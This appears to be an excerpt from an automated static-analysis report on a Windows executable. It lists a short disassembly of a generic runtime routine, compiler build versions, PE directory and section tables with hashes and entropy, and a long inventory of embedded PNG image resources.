                                                                                      mov edi, edi
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      mov esi, dword ptr [ebp+14h]
                                                                                      test esi, esi
                                                                                      jne 00007F7340E61296h
                                                                                      xor eax, eax
                                                                                      jmp 00007F7340E612F3h
                                                                                      cmp dword ptr [ebp+08h], 00000000h
                                                                                      jne 00007F7340E612A5h
                                                                                      call 00007F7340E64CBCh
                                                                                      push 00000016h
                                                                                      pop esi
                                                                                      mov dword ptr [eax], esi
                                                                                      call 00007F7340E68DC5h
                                                                                      mov eax, esi
                                                                                      jmp 00007F7340E612DAh
                                                                                      cmp dword ptr [ebp+10h], 00000000h
                                                                                      je 00007F7340E612A8h
                                                                                      cmp dword ptr [ebp+0Ch], esi
                                                                                      jc 00007F7340E612A3h
                                                                                      push esi
                                                                                      push dword ptr [ebp+10h]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call 00007F7340E65C07h
                                                                                      add esp, 0Ch
                                                                                      jmp 00007F7340E61259h
                                                                                      push dword ptr [ebp+0Ch]
                                                                                      push 00000000h
                                                                                      push dword ptr [ebp+08h]
                                                                                      call 00007F7340E64425h
                                                                                      add esp, 0Ch
                                                                                      cmp dword ptr [ebp+10h], 00000000h
                                                                                      je 00007F7340E6124Dh
                                                                                      cmp dword ptr [ebp+0Ch], esi
                                                                                      jnc 00007F7340E612A0h
                                                                                      call 00007F7340E64C72h
                                                                                      push 00000022h
                                                                                      pop ecx
                                                                                      mov dword ptr [eax], ecx
                                                                                      mov esi, ecx
                                                                                      jmp 00007F7340E61244h
                                                                                      push 00000016h
                                                                                      pop eax
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      ret
                                                                                      mov edi, edi
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push dword ptr [ebp+08h]
                                                                                      push ecx
                                                                                      call 00007F7340E68DE8h
                                                                                      pop ecx
                                                                                      pop ecx
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      mov edi, edi
                                                                                      push ecx
                                                                                      mov dword ptr [ecx], 00000060h
                                                                                      Programming Language:
                                                                                      • [C++] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2010 SP1 build 40219
                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                      • [C++] VS2010 SP1 build 40219
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                      • [LNK] VS2010 SP1 build 40219
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4322d40x168.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x56b0000x15cbc4.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x65e2000x2f58.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c80000x4828c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3b1bd00x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3f75780x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x3ad0000x9c8.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x3abf590x3ac000398b9f5dbf54c7db778af2e290359ec2unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x3ad0000x888140x88a00ab24b99083baffb092ae4cfcd44b7050False0.3208271386093321data5.109197536267353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x4360000x1345bc0x16e004c6d5a06fe60aeb0032ea6157e4b5d64False0.12441299521857924data4.187393367060302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x56b0000x15cbc40x15cc00ccc8f2d00c82dbda223100ff19e29ecbFalse0.6405346942204301data7.439415683359232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x6c80000xb5a000xb5a006d32cb20453ca8ebf451c8c4c05c85c2False0.5884350266689607data6.997997286134788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      PNG0x57eb840x77PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9915966386554622
                                                                                      PNG0x57ebfc0x2f5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0145310435931307
                                                                                      PNG0x57eef40x301PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0143042912873863
                                                                                      PNG0x57f1f80x287PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.017001545595054
                                                                                      PNG0x57f4800x36ePNG image data, 22 x 40, 8-bit/color RGB, non-interlacedEnglishUnited States1.0125284738041003
                                                                                      PNG0x57f7f00x15dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0315186246418337
                                                                                      PNG0x57f9500x13ePNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0345911949685536
                                                                                      PNG0x57fa900x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                      PNG0x57fba80x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0302013422818792
                                                                                      PNG0x57fcd40x20cPNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0209923664122138
                                                                                      PNG0x57fee00xfdPNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0276679841897234
                                                                                      PNG0x57ffe00xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x5800880x7cPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                      PNG0x5801040x96PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0133333333333334
                                                                                      PNG0x58019c0x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                      PNG0x5802300x84PNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States0.9848484848484849
                                                                                      PNG0x5802b40xa3PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0122699386503067
                                                                                      PNG0x5803580x771PNG image data, 13 x 156, 8-bit/color RGB, non-interlacedEnglishUnited States1.005774278215223
                                                                                      PNG0x580acc0x697PNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006520450503853
                                                                                      PNG0x5811640x342PNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013189448441247
                                                                                      PNG0x5814a80x45fPNG image data, 24 x 72, 8-bit/color RGB, non-interlacedEnglishUnited States1.0098302055406614
                                                                                      PNG0x5819080x1a3PNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.026252983293556
                                                                                      PNG0x581aac0xac8PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039855072463768
                                                                                      PNG0x5825740x37cPNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123318385650224
                                                                                      PNG0x5828f00xa50PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0041666666666667
                                                                                      PNG0x5833400x48ePNG image data, 9 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009433962264151
                                                                                      PNG0x5837d00xa50PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0041666666666667
                                                                                      PNG0x5842200x380PNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                      PNG0x5845a00xab0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040204678362572
                                                                                      PNG0x5850500xb1fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038637161924833
                                                                                      PNG0x585b700xa8ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040710584752035
                                                                                      PNG0x5866000xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                      PNG0x5871300x3a6PNG image data, 48 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011777301927195
                                                                                      PNG0x5874d80x111bPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025119890385932
                                                                                      PNG0x5885f40x3d1PNG image data, 23 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112589559877174
                                                                                      PNG0x5889c80x21bPNG image data, 11 x 88, 8-bit/color RGB, non-interlacedEnglishUnited States1.0204081632653061
                                                                                      PNG0x588be40xb12PNG image data, 50 x 273, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003881439661256
                                                                                      PNG0x5896f80x7acPNG image data, 50 x 162, 8-bit/color RGBA, non-interlacedEnglishUnited States1.005600814663951
                                                                                      PNG0x589ea40xd43PNG image data, 50 x 264, 8-bit/color RGB, non-interlacedEnglishUnited States1.003240058910162
                                                                                      PNG0x58abe80x3a4PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011802575107296
                                                                                      PNG0x58af8c0x320PNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.01375
                                                                                      PNG0x58b2ac0x31fPNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0137672090112642
                                                                                      PNG0x58b5cc0x2bdPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0156918687589158
                                                                                      PNG0x58b88c0x273PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0175438596491229
                                                                                      PNG0x58bb000x2c9PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0154277699859748
                                                                                      PNG0x58bdcc0x163PNG image data, 70 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112676056338028
                                                                                      PNG0x58bf300x152PNG image data, 41 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032544378698225
                                                                                      PNG0x58c0840x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                      PNG0x58c4100x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x58c9440x19cPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8810679611650486
                                                                                      PNG0x58cae00x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                      PNG0x58ed780x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x58f4180x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8252212389380531
                                                                                      PNG0x58f5dc0x522PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008371385083714
                                                                                      PNG0x58fb000x2475PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000750026786671
                                                                                      PNG0x591f780x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x5926180x1c3PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8314855875831486
                                                                                      PNG0x5927dc0x505PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0085603112840467
                                                                                      PNG0x592ce40x24d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004243131430997
                                                                                      PNG0x5951b80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x5958580x1c7PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.832967032967033
                                                                                      PNG0x595a200x536PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082458770614693
                                                                                      PNG0x595f580x24f0PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011632825719121
                                                                                      PNG0x5984480x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x598ae80x1c5PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8388520971302428
                                                                                      PNG0x598cb00x4d9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008863819500403
                                                                                      PNG0x59918c0x23d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x59b5600x189PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279898218829517
                                                                                      PNG0x59b6ec0x1bcPNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7027027027027027
                                                                                      PNG0x59b8a80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x59bf480x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.827433628318584
                                                                                      PNG0x59c10c0x4efPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087094220110848
                                                                                      PNG0x59c5fc0x23a2PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0007673755755317
                                                                                      PNG0x59e9a00xc5PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0253807106598984
                                                                                      PNG0x59ea680x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x59f1080x1baPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8212669683257918
                                                                                      PNG0x59f2c40x4e4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087859424920127
                                                                                      PNG0x59f7a80x250fPNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005270369979973
                                                                                      PNG0x5a1cb80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x5a23580x1c2PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8288888888888889
                                                                                      PNG0x5a251c0x4e9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087509944311854
                                                                                      PNG0x5a2a080x23c6PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000436776588775
                                                                                      PNG0x5a4dd00xb5PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0165745856353592
                                                                                      PNG0x5a4e880x186PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028205128205128
                                                                                      PNG0x5a50100x1b5PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6864988558352403
                                                                                      PNG0x5a51c80x66PNG image data, 1 x 46, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9803921568627451
                                                                                      PNG0x5a52300xf9PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0321285140562249
                                                                                      PNG0x5a532c0x17c3PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.992931119513398
                                                                                      PNG0x5a6af00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                      PNG0x5a6d740x71PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9823008849557522
                                                                                      PNG0x5a6de80x71dPNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0060406370126305
                                                                                      PNG0x5a75080x794PNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0056701030927835
                                                                                      PNG0x5a7c9c0x284PNG image data, 7 x 39, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0170807453416149
                                                                                      PNG0x5a7f200x203PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021359223300971
                                                                                      PNG0x5a81240x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0251716247139588
                                                                                      PNG0x5a82dc0xb2PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.0168539325842696
                                                                                      PNG0x5a83900xd1PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9760765550239234
                                                                                      PNG0x5a84640x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                      PNG0x5a86800x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                      PNG0x5a889c0x1aePNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0186046511627906
                                                                                      PNG0x5a8a4c0x13aPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0222929936305734
                                                                                      PNG0x5a8b880x13fPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0344827586206897
                                                                                      PNG0x5a8cc80x135PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9967637540453075
                                                                                      PNG0x5a8e000xdbPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0228310502283104
                                                                                      PNG0x5a8edc0xc6PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0252525252525253
                                                                                      PNG0x5a8fa40x1a9PNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0141176470588236
                                                                                      PNG0x5a91500x19bPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194647201946472
                                                                                      PNG0x5a92ec0x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                      PNG0x5ab5840x13ePNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0345911949685536
                                                                                      PNG0x5ab6c40x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                      PNG0x5ab7dc0x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                      PNG0x5ab8600xcePNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0242718446601942
                                                                                      PNG0x5ab9300xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                      PNG0x5ac4600x25fPNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0181219110378912
                                                                                      PNG0x5ac6c00x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                      PNG0x5ac73c0x170PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9755434782608695
                                                                                      PNG0x5ac8ac0x26bPNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0177705977382876
                                                                                      PNG0x5acb180x105PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9731800766283525
                                                                                      PNG0x5acc200xe6PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0260869565217392
                                                                                      PNG0x5acd080x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                      PNG0x5ad0980x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                      PNG0x5ad3000x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                      PNG0x5ad41c0xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                      PNG0x5ad4c80x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x5ad5f40x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                      PNG0x5ad8000xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                      PNG0x5ad8f80xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                      PNG0x5ad9a00x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                      PNG0x5adaf00xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                      PNG0x5adb9c0x89PNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x5adc280x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                      PNG0x5adcc00x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                      PNG0x5add540x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                      PNG0x5addd40xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x5ade7c0xbcPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159574468085106
                                                                                      PNG0x5adf380xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                      PNG0x5ae9400x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                      PNG0x5b07240x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                      PNG0x5b08e40x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x5b0e200x440PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010110294117647
                                                                                      PNG0x5b12600x12ePNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0298013245033113
                                                                                      PNG0x5b13900x5b1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075497597803706
                                                                                      PNG0x5b19440x408PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0106589147286822
                                                                                      PNG0x5b1d4c0x471PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009674582233949
                                                                                      PNG0x5b21c00x4b7PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091135045567523
                                                                                      PNG0x5b26780x481PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0095403295750216
                                                                                      PNG0x5b2afc0x3ecPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109561752988048
                                                                                      PNG0x5b2ee80x452PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0099457504520795
                                                                                      PNG0x5b333c0x414PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                      PNG0x5b37500x39ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011879049676026
                                                                                      PNG0x5b3af00x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                      PNG0x5b3f800x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x5b41340xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                      PNG0x5b42200x1ae0PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0015988372093023
                                                                                      PNG0x5b5d000xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      PNG0x5b68440x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                      PNG0x5b6e500x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                      PNG0x5b87000x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                      PNG0x5b98780x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                      PNG0x5bbe640xacbPNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039811798769454
                                                                                      PNG0x5bc9300xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                      PNG0x5bd4f80xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                      PNG0x5be1280x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                      PNG0x5be7080x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                      PNG0x5beca00x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                      PNG0x5bf2980x237PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194003527336861
                                                                                      PNG0x5bf4d00x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                      PNG0x5bfa580x4b6PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091210613598673
                                                                                      PNG0x5bff100x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x5c04440x5fePNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071707953063884
                                                                                      PNG0x5c0a440xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                      PNG0x5c18180x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                      PNG0x5c18940x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                      PNG0x5c2c580x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                      PNG0x5c2fd80x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                      PNG0x5c33700x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                      PNG0x5c45d00x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                      PNG0x5c59840x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                      PNG0x5c5cf00x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                      PNG0x5c60bc0x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                      PNG0x5c73dc0x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                      PNG0x5c87880x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                      PNG0x5c8aec0x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                      PNG0x5c8ea80x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                      PNG0x5ca11c0x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                      PNG0x5cb4bc0x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
